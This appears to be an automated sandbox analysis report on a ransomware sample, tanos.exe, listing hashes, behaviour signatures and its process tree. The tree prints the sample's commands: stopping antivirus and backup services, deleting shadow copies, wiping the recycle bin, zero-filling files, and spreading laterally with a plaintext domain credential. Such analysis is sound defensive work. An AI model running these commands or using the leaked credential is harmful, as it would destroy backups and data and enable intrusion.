Analysis

  • max time kernel
    943s
  • max time network
    946s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    17-05-2022 10:35

General

  • Target

    tanos.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 14 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tanos.exe
    "C:\Users\Admin\AppData\Local\Temp\tanos.exe"
    1⤵
    • Modifies extensions of user files
    • Checks computer location settings
    • Drops startup file
    • Windows security modification
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4240
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
          PID:1420
      • C:\Windows\SYSTEM32\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          3⤵
            PID:224
        • C:\Windows\SYSTEM32\net.exe
          "net.exe" stop mfewc /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop mfewc /y
            3⤵
              PID:4480
          • C:\Windows\SYSTEM32\net.exe
            "net.exe" stop BMR Boot Service /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5036
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop BMR Boot Service /y
              3⤵
                PID:3512
            • C:\Windows\SYSTEM32\net.exe
              "net.exe" stop NetBackup BMR MTFTP Service /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5060
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                3⤵
                  PID:4580
              • C:\Windows\SYSTEM32\net.exe
                "net.exe" stop SavRoam /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3220
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop SavRoam /y
                  3⤵
                    PID:628
                • C:\Windows\SYSTEM32\net.exe
                  "net.exe" stop RTVscan /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:116
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop RTVscan /y
                    3⤵
                      PID:2700
                  • C:\Windows\SYSTEM32\net.exe
                    "net.exe" stop ccSetMgr /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3188
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop ccSetMgr /y
                      3⤵
                        PID:5020
                    • C:\Windows\SYSTEM32\net.exe
                      "net.exe" stop ccEvtMgr /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4776
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop ccEvtMgr /y
                        3⤵
                          PID:2964
                      • C:\Windows\SYSTEM32\net.exe
                        "net.exe" stop DefWatch /y
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4924
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop DefWatch /y
                          3⤵
                            PID:3476
                        • C:\Windows\SYSTEM32\net.exe
                          "net.exe" stop QBFCService /y
                          2⤵
                            PID:3832
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop QBFCService /y
                              3⤵
                                PID:2888
                            • C:\Windows\SYSTEM32\net.exe
                              "net.exe" stop QBIDPService /y
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4072
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 stop QBIDPService /y
                                3⤵
                                  PID:4432
                              • C:\Windows\SYSTEM32\net.exe
                                "net.exe" stop Intuit.QuickBooks.FCS /y
                                2⤵
                                  PID:3720
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                    3⤵
                                      PID:956
                                  • C:\Windows\SYSTEM32\net.exe
                                    "net.exe" stop zhudongfangyu /y
                                    2⤵
                                      PID:3468
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop zhudongfangyu /y
                                        3⤵
                                          PID:3320
                                      • C:\Windows\SYSTEM32\net.exe
                                        "net.exe" stop VSNAPVSS /y
                                        2⤵
                                          PID:964
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 stop VSNAPVSS /y
                                            3⤵
                                              PID:3844
                                          • C:\Windows\SYSTEM32\net.exe
                                            "net.exe" stop VeeamDeploymentService /y
                                            2⤵
                                              PID:3460
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                3⤵
                                                  PID:4648
                                              • C:\Windows\SYSTEM32\net.exe
                                                "net.exe" stop PDVFSService /y
                                                2⤵
                                                  PID:924
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop PDVFSService /y
                                                    3⤵
                                                      PID:112
                                                  • C:\Windows\SYSTEM32\net.exe
                                                    "net.exe" stop BackupExecVSSProvider /y
                                                    2⤵
                                                      PID:1744
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                        3⤵
                                                          PID:4952
                                                      • C:\Windows\SYSTEM32\net.exe
                                                        "net.exe" stop BackupExecDiveciMediaService /y
                                                        2⤵
                                                          PID:1468
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                            3⤵
                                                              PID:996
                                                          • C:\Windows\SYSTEM32\net.exe
                                                            "net.exe" stop BackupExecJobEngine /y
                                                            2⤵
                                                              PID:4956
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                3⤵
                                                                  PID:4788
                                                              • C:\Windows\SYSTEM32\net.exe
                                                                "net.exe" stop BackupExecRPCService /y
                                                                2⤵
                                                                  PID:3976
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                    3⤵
                                                                      PID:5296
                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                    "net.exe" stop AcronisAgent /y
                                                                    2⤵
                                                                      PID:4188
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop AcronisAgent /y
                                                                        3⤵
                                                                          PID:5436
                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                        "net.exe" stop AcrSch2Svc /y
                                                                        2⤵
                                                                          PID:4488
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                            3⤵
                                                                              PID:5424
                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                            "net.exe" stop BackupExecManagementService /y
                                                                            2⤵
                                                                              PID:804
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                3⤵
                                                                                  PID:5304
                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                "net.exe" use \\10.127.0.75 /USER:SHJPOLICE\amer !Omar2012
                                                                                2⤵
                                                                                  PID:6060
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                  2⤵
                                                                                    PID:5096
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" Delete Shadows /all /quiet
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:3864
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:5032
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:680
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:3576
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:1396
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:224
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:1232
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:4548
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:2752
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:3908
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Enumerates connected drives
                                                                                    • Interacts with shadow copies
                                                                                    PID:5100
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:1988
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:3264
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    "vssadmin.exe" Delete Shadows /all /quiet
                                                                                    2⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:3168
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2604
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4672
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM mspub.exe /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3384
                                                                                  • C:\Windows\SYSTEM32\sc.exe
                                                                                    "sc.exe" config SstpSvc start= disabled
                                                                                    2⤵
                                                                                      PID:320
                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                      "sc.exe" config SQLWriter start= disabled
                                                                                      2⤵
                                                                                        PID:1612
                                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                                        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                        2⤵
                                                                                          PID:4580
                                                                                        • C:\Windows\SYSTEM32\sc.exe
                                                                                          "sc.exe" config SQLTELEMETRY start= disabled
                                                                                          2⤵
                                                                                            PID:2896
                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                            "net.exe" stop sophos /y
                                                                                            2⤵
                                                                                              PID:5116
                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                              "net.exe" stop CAARCUpdateSvc /y
                                                                                              2⤵
                                                                                                PID:3716
                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                "net.exe" stop CASAD2DWebSvc /y
                                                                                                2⤵
                                                                                                  PID:3924
                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                  "net.exe" stop BackupExecAgentBrowser /y
                                                                                                  2⤵
                                                                                                    PID:1448
                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                    "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                    2⤵
                                                                                                      PID:2628
                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                      "net.exe" stop veeam /y
                                                                                                      2⤵
                                                                                                        PID:4892
                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                        "net.exe" stop VeeamNFSSvc /y
                                                                                                        2⤵
                                                                                                          PID:4784
                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                          "net.exe" stop VeeamTransportSvc /y
                                                                                                          2⤵
                                                                                                            PID:1836
                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                            "net.exe" stop stc_raw_agent /y
                                                                                                            2⤵
                                                                                                              PID:1040
                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                              "net.exe" stop YooIT /y
                                                                                                              2⤵
                                                                                                                PID:2208
                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                "net.exe" stop YooBackup /y
                                                                                                                2⤵
                                                                                                                  PID:4088
                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                  "net.exe" stop QBCFMonitorService /y
                                                                                                                  2⤵
                                                                                                                    PID:4612
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\k0xherol.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\k0xherol.exe" \10.127.0.75 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\tanos.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:556
                                                                                                                  • C:\Windows\SYSTEM32\arp.exe
                                                                                                                    "arp" -a
                                                                                                                    2⤵
                                                                                                                      PID:2464
                                                                                                                    • C:\Windows\System32\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                      2⤵
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      PID:1820
                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                      2⤵
                                                                                                                        PID:3912
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping 127.0.0.7 -n 3
                                                                                                                          3⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4180
                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                          fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                          3⤵
                                                                                                                            PID:720
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tanos.exe
                                                                                                                          2⤵
                                                                                                                            PID:1884
                                                                                                                            • C:\Windows\system32\choice.exe
                                                                                                                              choice /C Y /N /D Y /T 3
                                                                                                                              3⤵
                                                                                                                                PID:4716
                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                            C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                                                                                            1⤵
                                                                                                                              PID:4576
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop YooBackup /y
                                                                                                                              1⤵
                                                                                                                                PID:1304
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                                                                1⤵
                                                                                                                                  PID:4180
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop veeam /y
                                                                                                                                  1⤵
                                                                                                                                    PID:4992
                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                    C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                                                                    1⤵
                                                                                                                                      PID:1984
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                      1⤵
                                                                                                                                        PID:5656
                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                        C:\Windows\system32\net1 stop sophos /y
                                                                                                                                        1⤵
                                                                                                                                          PID:5688
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                          1⤵
                                                                                                                                            PID:5664
                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5924
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            1⤵
                                                                                                                                              PID:4480
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                                              1⤵
                                                                                                                                                PID:744
                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                                                                1⤵
                                                                                                                                                  PID:3048
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                                                                                                  1⤵
                                                                                                                                                    PID:368
                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                    C:\Windows\system32\net1 stop YooIT /y
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4060

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\k0xherol.exe

                                                                                                                                                      Filesize

                                                                                                                                                      219KB

                                                                                                                                                      MD5

                                                                                                                                                      b1dfb4f9eb3e598d1892a3bd3a92f079

                                                                                                                                                      SHA1

                                                                                                                                                      0fc135b131d0bb47c9a0aaf02490701303b76d3b

                                                                                                                                                      SHA256

                                                                                                                                                      ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

                                                                                                                                                      SHA512

                                                                                                                                                      98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\k0xherol.exe

                                                                                                                                                      Filesize

                                                                                                                                                      219KB

                                                                                                                                                      MD5

                                                                                                                                                      b1dfb4f9eb3e598d1892a3bd3a92f079

                                                                                                                                                      SHA1

                                                                                                                                                      0fc135b131d0bb47c9a0aaf02490701303b76d3b

                                                                                                                                                      SHA256

                                                                                                                                                      ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

                                                                                                                                                      SHA512

                                                                                                                                                      98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

                                                                                                                                                    • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      c958eca58e649ad41137a5e190d26026

                                                                                                                                                      SHA1

                                                                                                                                                      6dd3f5aab997b0498ab474446113cd2d5a62264e

                                                                                                                                                      SHA256

                                                                                                                                                      12df7f594dabb18bd394fb198b26e7044238abfe84fd0b29473ff4cb0d143324

                                                                                                                                                      SHA512

                                                                                                                                                      64a2ad913dcda1b7b33026c54502bd143c67b548663bdcb00a6be7f49b555f11e6f03a5379f49308614f42dc045f33b3cfe46a0f5a9dce151c0b799532c0e5b7

                                                                                                                                                    • memory/4716-132-0x0000029340650000-0x0000029340672000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/4716-134-0x00007FF8786D0000-0x00007FF879191000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/4720-130-0x0000000000F30000-0x0000000000F4C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      112KB

                                                                                                                                                    • memory/4720-133-0x00007FF8786D0000-0x00007FF879191000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB